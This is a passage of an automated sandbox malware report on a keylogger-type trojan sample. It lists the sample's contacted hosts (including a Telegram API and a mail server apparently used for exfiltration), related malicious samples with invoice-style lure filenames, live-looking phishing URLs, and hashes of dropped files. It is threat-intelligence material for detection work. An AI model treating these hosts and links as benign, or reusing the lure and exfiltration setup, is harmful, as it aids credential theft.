                              https://reallyfreegeoip.org/xml/VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              132.226.8.169
                              checkip.dyndns.comUnited States
                              16989UTMEMUSfalse
                              149.154.167.220
                              api.telegram.orgUnited Kingdom
                              62041TELEGRAMRUtrue
                              217.12.218.219
                              mail.jhxkgroup.onlineUkraine
                              21100ITLDC-NLUAtrue
                              188.114.96.3
                              reallyfreegeoip.orgEuropean Union
                              13335CLOUDFLARENETUStrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1519406
                              Start date and time:2024-09-26 13:43:07 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:VbcXXnmIwPPhh.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/9@4/4
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 89
                              • Number of non-executed functions: 18
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 199.232.210.172
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: VbcXXnmIwPPhh.exe
                              TimeTypeDescription
                              07:44:01API Interceptor5823262x Sleep call for process: VbcXXnmIwPPhh.exe modified
                              07:44:04API Interceptor14x Sleep call for process: powershell.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              132.226.8.169SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                              • checkip.dyndns.org/
                              z9OutstandingPayment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              rPO_CW00402902400438.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              MCB_09252024.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • checkip.dyndns.org/
                              149.154.167.220nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                  ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                    SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                              Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                  217.12.218.219Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                    SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                                      Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exeGet hashmaliciousVIP KeyloggerBrowse
                                                          listener.dll.vbsGet hashmaliciousAgentTeslaBrowse
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            mail.jhxkgroup.onlineThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            reallyfreegeoip.orgRef_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.97.3
                                                            api.telegram.orgnBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            https://link.edgepilot.com/s/ac2abbfe/hqsaYDfTTkaTmtUeMi97cg?u=https://telecommunications-delicious-oriental-hu.trycloudflare.com/owa%23jfrench@coastalorthopedics.comGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                            • 149.154.167.220
                                                            bg.microsoft.map.fastly.nethttps://finalsteptogo.com/uploads/il4.txtGet hashmaliciousUnknownBrowse
                                                            • 199.232.214.172
                                                            DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                            • 199.232.214.172
                                                            http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==Get hashmaliciousHTMLPhisherBrowse
                                                            • 199.232.210.172
                                                            https://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                                                            • 199.232.214.172
                                                            http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                            • 199.232.210.172
                                                            FkGxLJH08w.jsGet hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            yK6gQ43tQ8.jsGet hashmaliciousUnknownBrowse
                                                            • 199.232.214.172
                                                            https://centuriontm.bizarreonly.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                            • 199.232.214.172
                                                            nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 199.232.214.172
                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 199.232.210.172
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TELEGRAMRUnBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            http://mintlink32.vercel.app/Get hashmaliciousHTMLPhisherBrowse
                                                            • 149.154.167.99
                                                            UTMEMUSnBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.8.169
                                                            Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.8.169
                                                            Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            z95g0YV3PKzM3LA5zt.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 132.226.247.73
                                                            SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            Halkbank_Ekstre_22#U202693.25.09.24.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 132.226.247.73
                                                            CLOUDFLARENETUShttps://41one2krrsa5qeao6vzl586pphkrbbn.planoverdesa.com.br/silionsedn/iriwgdposn/gjwofhytyv/Zoaodhuxzz/g5Altx/cmljbEBubml0LmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            rDoc5633276235623657_xls.exeGet hashmaliciousStormKitty, XWormBrowse
                                                            • 162.159.135.233
                                                            https://game-repack.site/2024/09/26/bloodborneGet hashmaliciousUnknownBrowse
                                                            • 104.21.84.200
                                                            e.dllGet hashmaliciousDridex DropperBrowse
                                                            • 104.21.69.9
                                                            https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdfGet hashmaliciousHTMLPhisherBrowse
                                                            • 104.18.38.76
                                                            http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                            • 104.16.79.73
                                                            http://ti6.htinenate.comGet hashmaliciousUnknownBrowse
                                                            • 172.67.162.17
                                                            https://coreleete.de/pt/Odrivex/Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.17.25.14
                                                            e.dllGet hashmaliciousDridex DropperBrowse
                                                            • 104.21.69.9
                                                            ITLDC-NLUAThyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            z1RFT798549034687-HJW90789-VXT9KGUINUII.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 185.174.175.187
                                                            rDFO68936OF-WVHU0780-FUIKTU4678G.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 185.174.175.187
                                                            BL Draft-Invoice-Packing list-Shipping Document.pif.exeGet hashmaliciousFormBookBrowse
                                                            • 185.174.173.22
                                                            SecuriteInfo.com.Win32.CrypterX-gen.9884.23346.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 217.12.218.219
                                                            SecuriteInfo.com.FileRepMalware.14031.20391.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 185.174.175.187
                                                            SecuriteInfo.com.FileRepMalware.19940.26551.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 185.174.173.22
                                                            MJI5380328-PQX82938839039-HW7V89292999.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 185.174.175.187
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            54328bd36c14bd82ddaa0c04b25ed9adRef_336210627.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            https://docs.google.com/drawings/d/1wD-DOvNLKuM60BZj5TLzFjKI87o3EE-OVAmvFF0fxPk/preview?usp=sharingGet hashmaliciousUnknownBrowse
                                                            • 188.114.96.3
                                                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            CMR_7649.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            RFQ____RM quotation_JPEG IMAGE.img.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 188.114.96.3
                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 188.114.96.3
                                                            3b5074b1b5d032e5620f69f9f700ff0erDoc5633276235623657_xls.exeGet hashmaliciousStormKitty, XWormBrowse
                                                            • 149.154.167.220
                                                            http://instructionhub.net/?gad_source=2&gclid=EAIaIQobChMI-pqSm7HgiAMVbfB5BB3YEjS_EAAYASAAEgJAAPD_BwEGet hashmaliciousWinSearchAbuseBrowse
                                                            • 149.154.167.220
                                                            sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                            • 149.154.167.220
                                                            nBank_Report.pif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            z1Invoice1.bat.exeGet hashmaliciousVIP KeyloggerBrowse
                                                            • 149.154.167.220
                                                            ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.09.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 149.154.167.220
                                                            sostener.vbsGet hashmaliciousAsyncRAT, DcRatBrowse
                                                            • 149.154.167.220
                                                            sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                            • 149.154.167.220
                                                            sostener.vbsGet hashmaliciousRemcosBrowse
                                                            • 149.154.167.220
                                                            asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                            • 149.154.167.220
                                                            No context
                                                            Process:C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                            Category:dropped
                                                            Size (bytes):71954
                                                            Entropy (8bit):7.996617769952133
                                                            Encrypted:true
                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                            Process:C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):328
                                                            Entropy (8bit):3.242990426783058
                                                            Encrypted:false
                                                            SSDEEP:6:kKMO9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:0xDImsLNkPlE99SNxAhUe/3
                                                            MD5:57B0716BD6AA45FB2F843355E03433C1
                                                            SHA1:A102AD12E01609653CC967AF01326E4B78530DB6
                                                            SHA-256:EB331CB16C9625CFE9C41D9D3BACD8124A31410CCF5218C109E1935CFE2F4669
                                                            SHA-512:5462550E32D97E7A26B45152516692AAA0FBFCB90AF6B1C1B99EC737A424D13C7686F3AFECC4470A99B7069E35C9F3FB129EAA0471F8B838694F196F61720F31
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:p...... .........q..l-..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                            Process:C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.380805901110357
                                                            Encrypted:false
                                                            SSDEEP:48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCZfIfSKRHmOugw1s
                                                            MD5:A6C11D5EB8FF113F746691904CC1C285
                                                            SHA1:85159530ED2933460F7D0793776D5FC2B1FAE500
                                                            SHA-256:7C1AA4858AF77BB1C1ADA78CE4816C4178A74E0A9CCFDB1E7F6A6FA3A08D6A1B
                                                            SHA-512:3460404875D62BD2318704741E443A0EF38352E977EEEE5EC7C39E6FCE9596D7E0F0A401780993697AE21FB68E2B9A9AF3A662667FB9EA48D7DD8E5B6148AF1E
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
